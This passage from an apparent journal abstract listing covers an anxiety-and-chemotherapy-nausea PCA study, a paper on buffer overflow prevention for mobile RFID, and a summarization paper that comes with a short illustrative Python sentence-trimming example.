State anxiety is a risk factor for chemotherapy-induced nausea and vomiting (CINV). However, anxiety is a subjective symptom and is difficult to quantify in clinical practice. Clinicians need appropriate anxiety measures to assess patients’ risks of CINV. We illustrate how unsupervised learning techniques can be applied in oncology practice to explore anxiety characteristics that can be used for the clinical surveillance of cancer patients with CINV. A single-centre, prospective, observational study was done on 49 head-and-neck cancer patients on cisplatin-based chemotherapy and appropriate antiemetic therapy. CINV events and antiemetic use were recorded using a standardized diary, while patients’ anxiety characteristics were evaluated using the Beck Anxiety Inventory. Principal component analysis (PCA) was used as an exploratory technique for statistical analysis. Three anxiety characteristics (indigestion, faintness, numbness) were identified as potential clinical predictors of CINV through the use of principal variables. The potential of PCA as a technique for characterizing anxiety in patients with CINV is indeed appealing. Despite the need to address several key issues before PCA finds widespread applications in cancer supportive care, we hope this study shows the usefulness of PCA as a potential technique in analyzing clinical populations, so as to ultimately improve patients’ quality of life.
——————————————————————————————————————————————————————————————————–
Buffer Overflow Prevention in Mobile RFID Environment using Train Algorithm [ Full-Text ]
M. Sandhya and T. R. Rangaswamy
RFID technology is widely used worldwide in a broad range of applications. This technology, however, raises security concerns about the protection of the information stored in RFID tags and exchanged during wireless communication with readers. Buffer overflow vulnerabilities dominate the area of remote network penetration, where an anonymous Internet user seeks to gain partial or total control of a host; if buffer overflow vulnerabilities could be effectively eliminated, a very large portion of the most serious security threats would be eliminated as well. This paper describes the use of the train algorithm to tackle buffer overflow attacks in a mobile RFID environment.
——————————————————————————————————————————————————————————————————–
Syntactic Trimming of Extracted Sentences for Improving Extractive Multi-document Summarization [ Full-Text ]
Kamal Sarkar
For managing a vast store of online or offline information, summarization can be a useful tool, because it lets users judge the relevance of an individual document or a document cluster from the summary alone. Multi-document summaries enable users to identify the main theme (central idea) of a cluster of texts very rapidly. This paper presents a sentence-compression-based summarization technique that uses a number of local and global sentence-trimming rules to improve the performance of an extractive multi-document summarization system. For our experiments, we develop (1) a primary summarization system, which extracts sentences to form a draft summary, and (2) a trimming component, which accepts a draft summary for revision. The trimming component eliminates low-content and redundant elements from the sentences in the draft summaries using local and global sentence-trimming rules without compromising the grammaticality or fluency of the summaries. In effect, the trimming process makes room for more diverse and salient units to appear in a summary. Our test results on the DUC 2004 data set show that the summarization system integrating both the extraction and trimming components performs better than several state-of-the-art summarization approaches.
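Two of the local trimming rules one might apply are easy to illustrate: dropping sentence-initial discourse connectives and parenthesized asides, both of which rarely carry summary-worthy content, plus a global pass that removes duplicate sentences. The specific patterns below are illustrative guesses, not the paper's rule set.

```python
import re

DISCOURSE_MARKERS = re.compile(
    r"^(However|Moreover|Meanwhile|In addition|For example|On the other hand)"
    r",\s+", re.IGNORECASE)

def trim_sentence(sentence):
    """Apply two local trimming rules and tidy the result."""
    s = DISCOURSE_MARKERS.sub("", sentence)        # rule 1: lead-in connective
    s = re.sub(r"\s*\([^()]*\)", "", s)            # rule 2: parenthetical aside
    s = re.sub(r"\s{2,}", " ", s).strip()
    return s[:1].upper() + s[1:] if s else s

def trim_summary(sentences):
    """Global pass: trim each sentence and drop exact duplicates,
    freeing space in the length budget for new salient content."""
    seen, out = set(), []
    for sent in sentences:
        t = trim_sentence(sent)
        if t and t.lower() not in seen:
            seen.add(t.lower())
            out.append(t)
    return out
```

The freed characters can then be spent on additional extracted sentences, which is exactly the "making room" effect the abstract describes.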